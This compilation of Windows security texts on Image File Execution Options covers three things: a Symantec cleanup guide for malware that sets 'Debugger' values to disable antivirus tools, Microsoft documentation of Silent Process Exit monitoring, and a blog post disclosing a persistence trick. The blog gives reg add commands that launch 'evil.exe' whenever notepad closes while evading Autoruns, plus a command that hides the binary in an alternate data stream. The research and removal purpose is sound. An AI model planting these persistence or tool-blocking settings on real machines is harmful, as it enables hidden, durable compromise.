Important: Symantec strongly recommends that you back up the registry before making any changes to it. Incorrect changes to the registry can result in permanent data loss or corrupted files. Modify the specified subkeys only. For instructions refer to the document: How to make a backup of the Windows registry.

Click Start > Run.
Type regedit
Click OK.

Note: If the registry editor fails to open, the threat may have modified the registry to prevent access to the registry editor. Security Response has developed a tool to resolve this problem. Download and run this tool, and then continue with the removal.

Navigate to and delete the following registry entries:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FYFireWall.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwmain.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwsrv.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPF.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Navapsvc.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Navapw32.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avconsol.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\webscanx.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NPFMntor.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsstat.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPfwSvc.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMonD.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQKav.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQDoctor.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EGHOST.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AgentSvr.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppSvc32.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrssvc.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AvMonitor.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FileDsty.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FTCleanerShell.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmor.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\isPwdSvc.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KaScrScn.SCR\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASMain.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASTask.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVDX.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPFW.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVSetup.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVStart.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KISLnchr.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMailMon.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMFilter.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32X.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFWSvc.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRepair.com\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KsLoader.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVCenter.kxp\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvfwMcl.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP_1.kxp\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvol.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvolself.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvReport.kxp\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVScan.kxp\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVSrvXP.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVStub.kxp\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvupload.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvwsc.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP_1.kxp\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch9x.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchX.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcconsol.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmqczj.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAV32.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32krn.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSET.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMonD.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavStub.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegClean.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwcfg.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RfwMain.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwsrv.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RsAgent.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rsaupd.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safelive.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scan32.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shcfg32.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmartUp.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.EXE\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\symlcsvc.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysSafe.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojanDetector.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Trojanwall.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UIHost.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAgent.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAttachment.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxCfg.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxFwHlp.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxPol.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UpLive.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwstub.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegTool.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwProxy.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RawCopy.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\filemon.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regmon.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntiArp.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GFUpd.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GFRing3.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQDoctorMain.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SelfUpdate.exe\"Debugger" =
""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Your Image File Name Here without a path\\""Debugger"" = ""ntsd -d"" Exit the Registry Editor. Note: If the risk creates or modifies registry subkeys or entries under HKEY_CURRENT_USER, it is possible that it created them for every user on the compromised computer. To ensure that all registry subkeys or entries are removed or restored, log on using each user account and check for any HKEY_CURRENT_USER items listed above. 5. To extract and restore Windows files The following documents provide general instructions on how to extract files. This information is provided for your convenience. The exact steps may vary slightly depending on the configuration of your operation system, the location of the files, and so on. For additional information, read the Help files, contact Microsoft, or refer to the following Windows documentation: The Microsoft Knowledge Base article: How to Extract Original Compressed Windows Files, Article ID Q129605, has detailed information for Windows 95/98/Me. How to extract files in Windows 98 and Windows Me. How to extract files using Windows 2000 or Windows NT 4.0. How to restore system files in Windows XP. 
Writeup By: Masaki Suenaga
-"Monitoring Silent Process Exit - Windows drivers | Microsoft Docs Skip to main content Contents Exit focus mode Feedback Edit Share Twitter LinkedIn Facebook Email Theme Light Dark High contrast Sign in Profile Sign out Contents Monitoring Silent Process Exit 11/28/2017 5 minutes to read In this article Beginning with Windows\xc2 7, you can use the Silent Process Exit tab in GFlags to enter the name of a process that you want to monitor for silent exit. In the context of this monitoring feature, we use the term silent exit to mean that the monitored process terminates in one of the following ways. Self termination The monitored process terminates itself by calling ExitProcess. Cross-process termination A second process terminates the monitored process by calling TerminateProcess. The monitoring feature does not detect normal process termination that happens when the last thread of the process exits. The monitoring feature does not detect process termination that is initiated by kernel-mode code. To register a process for silent exit monitoring, open the Silent Process Exit tab in GFlags. Enter the process name as the Image and press the Tab key. Check the Enable Silent Process Exit Monitoring box, and click Apply. This sets the FLG_MONITOR_SILENT_PROCESS_EXIT flag in the following registry entry. HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ProcessName\\GlobalFlag For more information about this flag, see Enable silent process exit monitoring. For more information about using the Silent Process Exit tab in GFlags, see Configuring Silent Process Exit Monitoring. In the Silent Process Exit tab of GFlags, you can configure the actions that will take place when a monitored process exits silently. You can configure notification, event logging, and creation of dump files. You can specify a process that will be launched when silent exit is detected, and you can specify a list of modules that the monitor will ignore. 
Several of these settings are available both globally and for individual applications. Global settings apply to all processes that you register for silent exit monitoring. Application settings apply to an individual process and override global settings.

Global settings are stored in the registry under the following key.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit

Application settings are stored in the registry under the following key.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\ProcessName

Reporting Mode

The Reporting Mode setting is available as an application setting, but not as a global setting. You can use the following check boxes to set the reporting mode.

Launch monitor process
Enable dump collection
Enable notification

The ReportingMode registry entry is a bitwise OR of the following flags.

Flag                   Value  Meaning
LAUNCH_MONITORPROCESS  0x1    When silent exit is detected, the monitor process (specified in the Monitor Process box) is launched.
LOCAL_DUMP             0x2    When silent exit is detected, a dump file is created for the monitored process. In the case of cross-process termination, a dump file is also created for the process that caused the termination.
NOTIFICATION           0x4    When silent exit is detected, a pop-up notification is displayed.

Ignore Self Exits

The Ignore Self Exits setting is available as an application setting, but not as a global setting. You can use the Ignore Self Exits check box to specify whether self exits are ignored. The IgnoreSelfExits registry entry has one of the following values.

Value  Meaning
0x0    Detect and respond to both self termination and cross-process termination.
0x1    Ignore self termination. Detect and respond to cross-process termination.

Monitor Process

You can specify a monitor process by entering a process name, along with command line parameters, in the Monitor Process text box. You can use the following variables in your command line.
Variable  Meaning
%e        ID of the exiting process. This is the monitored process that exited silently.
%i        ID of the initiating process. In the case of self termination, this is the same as the exiting process. In the case of cross-process termination, this is the ID of the process that caused the termination.
%t        ID of the initiating thread. This is the thread that caused the termination.
%c        The status code passed to ExitThread or TerminateThread.

For example, the following value for Monitor Process specifies that on silent exit, WinDbg is launched and attached to the exiting process.

windbg -p %e

The Monitor Process command line is stored in the MonitorProcess registry entry.

Dump Folder Location

You can use the Dump folder location text box to specify a location for the dump files that are written when a silent exit is detected. The string that you enter for Dump folder location is stored in the LocalDumpFolder registry entry. If you do not specify a dump folder location, dump files are written to the default location, which is %TEMP%\Silent Process Exit.

Dump Folder Size

You can use the Dump folder size text box to specify the maximum number of dump files that can be written to the dump folder. Enter this value as a decimal integer. The value that you enter for Dump folder size is stored in the MaximumNumberOfDumpFiles registry entry. By default, there is no limit to the number of dump files that can be written.

Dump Type

You can use the Dump Type drop-down list to specify the type of dump file (Micro, Mini, Heap, or Custom) that is written when a silent exit is detected. The dump type is stored in the DumpType registry entry, which is a bitwise OR of the members of the MINIDUMP_TYPE enumeration. This enumeration is defined in dbghelp.h, which is included in the Debugging Tools for Windows package. For example, suppose you chose a dump type of Micro, and you see that the DumpType registry entry has a value of 0x88.
The value 0x88 is a bitwise OR of the following two MINIDUMP_TYPE enumeration values.

MiniDumpFilterModulePaths  0x00000080
MiniDumpFilterMemory       0x00000008

If you choose a dump type of Custom, enter your own bitwise OR of MINIDUMP_TYPE enumeration values in the Custom Dump Type box. Enter this value as a decimal integer.

Module Ignore List

You can use the Module Ignore List box to specify a list of modules that will be ignored when a silent exit is detected. If the monitored process is terminated by one of the modules in this list, the silent exit is ignored. The list of modules that you enter in the Module Ignore List box is stored in the ModuleIgnoreList registry entry.

Reading Process Exit Reports in Event Viewer

When a monitored process exits silently, the monitor creates an entry in Event Viewer. To open Event Viewer, enter the command eventvwr.msc. Navigate to Windows Logs > Application. Look for log entries that have a Source of Process Exit Monitor.
-"Persistence using GlobalFlags in Image File Execution Options \xe2\x80\x93 Hidden from Autoruns.exe \xe2\x80\x93 Oddvar Moe's Blog Skip to content Menu Home About Presentations Articles AppLocker Case study AppLocker \xe2\x80\x93 Case study \xe2\x80\x93 Part 1 AppLocker \xe2\x80\x93 Case study \xe2\x80\x93 Part 2 AppLocker \xe2\x80\x93 Hardening \xe2\x80\x93 Part 1 AppLocker \xe2\x80\x93 Hardening \xe2\x80\x93 Part 2 AppLocker for admins \xe2\x80\x93 Does it work? Bypassing AppLocker as an admin AppLocker \xe2\x80\x93 Making sure that local rules are removed Real whitelisting attempt using AppLocker Ultimate AppLocker Bypass List Oddvar Moe's Blog Notes from My adventures with Windows security Persistence using GlobalFlags in Image File Execution Options \xe2\x80\x93 Hidden from\xc2 Autoruns.exe Posted on 10 Apr 201811 Apr 2018 by Oddvar Moe [MVP] TL;DR \xe2\x80\x93 Found a technique to execute any binary file after another application is closed without being detected by Autoruns.exe. \xe2\x80\x93 Requires administrator rights and does not belong in userland. \xe2\x80\x93 Can also be executed from alternate data streams \xe2\x80\x93 Plant file on disk and run these commands to create persistence that triggers everytime someone closes notepad.exe: reg add ""HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 reg add ""HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 reg add ""HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe"" /v MonitorProcess /d ""C:\\temp\\evil.exe"" \xc2 \xc2 Image File Execution Options Another day with some unstructered research time. I must admit that it feels good every time. 
🙂 Last time I found a way to execute DLL files and still hide from Autoruns.exe. This time I found some interesting stuff that I have not found that much related information on, and hopefully it will help people detect someone if they are using this technique.

This adventure started out when I was looking for other ways to execute data from alternate streams. Somehow I ended up in Process Monitor (big surprise) and started looking at the Image File Execution Options. Normally I would just pass by these, since I always assume that someone has probably already discovered all there is to discover. Again it turns out that assumptions are the mother of all fu**ups.

I started by Googling for information about the Image File Execution Options and especially the ApplicationGoo setting and I ended up here: https://blogs.msdn.microsoft.com/junfeng/2004/04/28/image-file-execution-options/

This blogpost also mentioned GlobalFlags and that caught my eye. After I was done Googling and searching for ApplicationGoo and what it did, I stumbled upon this and it turned out that you can add the ApplicationGoo in a special way to fake what operating system you are running to a process. I am not done researching the ApplicationGoo, so feel free to go on your own adventure. 😉

I returned to read some more details about the GlobalFlags, since that was more interesting. The MSDN blog stated the following (Thanks Microsoft):

If you play with gflags.exe more, you will find more interesting registry values under Image File Execution Options.

A quick search for gflags.exe and I found that this is a part of the Windows 10 SDK, and this binary was already present on my machine. I fired up the application and it looks like this:

This application can be used to change all the flags related to the execution of a binary. Here could also be more interesting stuff to dig into that I have not looked at yet.
The first thing I tried was to check if this application could work as a Device Guard bypass by leveraging the Launch command. This turned out to be negative. Based on my previous experience I already knew what the debugger flag does so I did not care about that. What I however found out was that under the "Silent Process Exit" tab there was a lot of other interesting stuff to look at. 😈

As you can see, my evil plan here is to execute an evil binary every time notepad.exe is closed. After planting this I verified that it worked by running just a renamed version of bginfo.exe. The point here is not the payload I am running, more the technique. After I close notepad.exe, evil.exe is spawned like this:

So this was pretty awesome I thought. It also turns out that autoruns.exe does not detect this technique. (Sorry Mark, even more to do with autoruns.exe)

After a bit more reversing I also figured out that the registry keys that decide what to launch as a silent "monitor" reside in "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\". All that gflags.exe does is actually only write the registry keys necessary. To achieve the same with some simple commands you could simply run the following lines in cmd.

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe"

This is also pretty well documented at docs.microsoft.com.

BONUS – Execute with Alternate data streams

Also figured out that you can leverage alternate data streams as well.
That means you can take the evil.exe and add it to, for instance, the tasks folder under C:\windows\ as an alternate stream. That can easily be done by changing the registry and using this command:

type c:\temp\evil.exe > c:\windows\tasks:evil.exe

